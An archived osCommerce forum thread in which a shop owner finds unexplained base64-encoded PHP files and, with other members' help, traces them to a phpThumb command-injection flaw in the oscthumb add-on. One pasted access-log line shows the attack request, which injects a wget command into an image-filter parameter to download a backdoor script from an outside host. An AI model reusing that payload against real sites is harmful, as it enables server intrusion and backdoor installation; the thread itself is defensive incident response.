Jump to content

Archived

This topic is now archived and is closed to further replies.

altoid

indeks.php and indeks.php1

Recommended Posts

this morning site monitor on a 2.2 shop of mine showed two new files...indeks.php and indeks.php1

 

they were put their sometime since yesterday am and when the site monitor cron ran this am.

 

they were located in the root/public_html folder, same level as index.php

 

the files showed base64 code within and upon converting, it's it had something to do with email hacking or so it appears to me.

 

all else seems fine on that shop.

 

i deleted those files

 

googling their names didn't give me much info.

 

does any one know anything about these files etc. just curious.

 

thanks


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

@@altoid

 

Secure your site ! Your server, change all usernames and passwords.

 

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

In many cases, those files appear via a server wide hack (i.e. a backdoor script such as this is dropped in the root of every site on a server). Contact your web service provider and ask them have their servers been compromised recently. Many providers keep a tight lip on these issues and prefer to lay the blame with the user.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

@@DunWeb

Thanks Chris...changed admin user name / pwd but due to a "front page" extension issue the admin folder password protection is a problem.. the host is working on that.

 

first time ever this shop has been compromised...it's an older 2.2 shop and really needs to be brought up to 2.3.3. i just need to tackle that and get a more secure php version to cover it.

 

@@Taipo

the host says negative on server wide issues, but they did have a huge nasty server wide issue a couple years back changing all the index files to a hacked file

thanks


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

@@altoid FrontPage extensions are no longer supported by MicroSoft so any security issues will not be fixed. You should ask your host to remove that option. The reason you can't change the password is probably because cPanel, assuming that is what your host uses, won't let you do that if it sees something to do with Frontpage in the .htaccess file. If you delete such entries, it should work. You can then add them back in if needed.

 

For the index files, if it is not too late, you can look in the servers ftp log to get the IP of whoever uploaded those. Your host may have to provide the log if you don't have access to it.

Share this post


Link to post
Share on other sites

@@Jack_mcs

 

Jack, the particular snafu with MS front page extensions, on my host anyway, is that they would not remove via the CP, nor my VPS WHM panels. Tech support had to do the removal and they just finished up, so now I can work with the protected folders in the 2.2 shops.

 

Good idea on the log....I will go trolling through those to see what IP might be the culprit. I have this handy add on in this shop that will let me block that IP or an entire range with just the click of of a button or two.

 

Thanks


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

@@Jack_mcs

Good idea on the log....I will go trolling through those to see what IP might be the culprit. I have this handy add on in this shop that will let me block that IP or an entire range with just the click of of a button or two.

LOL.

Share this post


Link to post
Share on other sites

reviewing the log file...the first instance of indeks.php is this:

 

41.151.224.2 - - [28/Apr/2013:18:38:57 -0400] "GET /oscthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://picasa.com.playteck.net/indeks.php;&phpThumbDebug=9 HTTP/1.1" 200 46324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0"

 

then later in the log there are 6 instances of

GET /indeks.php from the same ip

 

which has now been banned from my site

 

so my question is what is the oscthumb involvement here?


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

Is file.jpg a real image? Maybe the hacker uploaded that file at some point and it has hacker code in it. You may also want to look in the Path Tracker report for that IP and see what he was doing. It might show something.

Share this post


Link to post
Share on other sites

@@Jack_mcs

path tracker for that ip showed this:

2013-04-28 18:37:59 product_info.php products_id=482

 

pid 482 is a legit product in the shop.

 

searching site...no file.jpg

 

looking here: http://labs.sucuri.net/?details=picasa.com.playteck.net

 

i find:

 

Details for the domain picasa.com.playteck.net

 

URLs and sub domains distributing the malware or acting as a redirector:

 

Blacklist status

 

Blacklist status for picasa.com.playteck.net: http://labs.sucuri.net/?blacklist=picasa.com.playteck.net

IP address information

 

Domain picasa.com.playteck.net is at: 67.55.40.35 (67.55.40.35)

ip info for that is:

 

IP address : 67.55.40.35

Country : CA

State/Province : ONTARIO

City : MISSISSAUGA

Zip or postal code : L4X 2Z3

 

i ran a site scan using sucuri.net and it came back clean.

 

same test through comodo came back clean


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

Interesting. I wonder if oscthumb is vulnerable ?


This is a signature that appears on all my posts.  
IF YOU MAKE A POST REQUESTING HELP...please state the exact version
of osCommerce that you are using. THANKS

 
Get the latest Responsive osCommerce CE (community edition) here

Share this post


Link to post
Share on other sites

@@burt

i'm running rob's kiss thumbnailer on my 2.3.3 shops .... which is where this 2.2 shop is headed. :-


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

@@altoid

@@burt

 

It looks like oscthumb runs phpThumb which is vulnerable.

 

This looks like what Steve posted from the exploit on his site:

http://foxtrot7security.blogspot.com/2011/12/new-attempts-to-exploit-old-phpthumb.html

 

I haven't tested this version but they are claiming it is updated to a more secure version of phpThumb: http://addons.oscommerce.com/info/5491


Matt

Share this post


Link to post
Share on other sites

@@mattjt83

 

Thanks Matt, I wasn't aware of that add on to address the vulnerability issue.

 

I am going to try that on an existing 2.2 shop, and then for another shop upgrade I opted to go with Robert's KISS Thumb add on.


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Share this post


Link to post
Share on other sites

×